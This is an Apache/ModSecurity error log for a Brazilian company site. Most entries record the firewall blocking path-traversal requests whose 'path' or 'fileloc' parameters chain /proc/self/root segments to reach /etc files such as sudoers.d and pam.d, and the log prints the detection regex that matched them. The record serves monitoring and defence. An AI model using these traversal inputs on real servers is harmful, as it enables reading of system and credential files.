[Tue Mar 17 14:13:48.547015 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.31:58898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmLzKBJNF7axNlVR0UXWQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:14:08.070265 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40666] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:14:17.937155 2026] [:error] [pid 30223:tid 140411607643904] [client 74.7.241.31:58902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmL6cT4LuLykoMK_89pKQAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:14:30.141919 2026] [proxy_fcgi:error] [pid 9299:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41266] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:14:32.167908 2026] [:error] [pid 29359:tid 140411599251200] [client 74.7.241.31:58564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmL-KSy22zYCMGxsIldBwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:14:39.977706 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.31:58566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmL_9CmCSWTlPouqork4QAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:14:52.159485 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41890] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:15:14.135008 2026] [proxy_fcgi:error] [pid 29359:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42486] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:15:36.089924 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43314] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:15:38.706658 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.128:59374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMOaBJNF7axNlVR0UXhgAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:15:41.607154 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.128:56874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMPat8Nd0UC_OcbVHLjgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:43.297685 2026] [:error] [pid 7004:tid 140411691570944] [client 74.7.243.128:56884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMP8U6Sx0TG1YjmQivUgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:44.826066 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.243.128:56900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMQMU6Sx0TG1YjmQivVgAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:46.263342 2026] [:error] [pid 29359:tid 140411666392832] [client 74.7.243.128:56912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMQqSy22zYCMGxsIldIAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:47.709381 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:56924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMQweiSKl8TjouI-YabwAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:50.582969 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.243.128:35824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMRvPqhzTj3BvfDX-IewAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:52.130937 2026] [:error] [pid 30223:tid 140411666392832] [client 74.7.243.128:35838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMSMT4LuLykoMK_89pYQAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:15:58.133793 2026] [proxy_fcgi:error] [pid 7437:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:16:00.201095 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.243.128:58128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMUK4xEDsg_V3ESNZM-AAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:01.899847 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.128:58134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMUQeiSKl8TjouI-YacQAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:03.810067 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:58144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMU9Y0UrI5A3LftIz8ZQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:14.005024 2026] [:error] [pid 30223:tid 140411674785536] [client 74.7.243.128:58152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMXsT4LuLykoMK_89peQAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:19.125866 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44738] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:16:21.046010 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.128:53652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMZQeiSKl8TjouI-YadAAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:22.509537 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.243.128:53664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMZqBJNF7axNlVR0UXjAAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:23.934749 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.243.128:53672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMZ8U6Sx0TG1YjmQivaQAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:24.313558 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.243.128:53672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMaMU6Sx0TG1YjmQivagAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:26.149207 2026] [:error] [pid 28879:tid 140411666392832] [client 74.7.243.128:53678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMalDN3UhJjLukrK-L4gAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
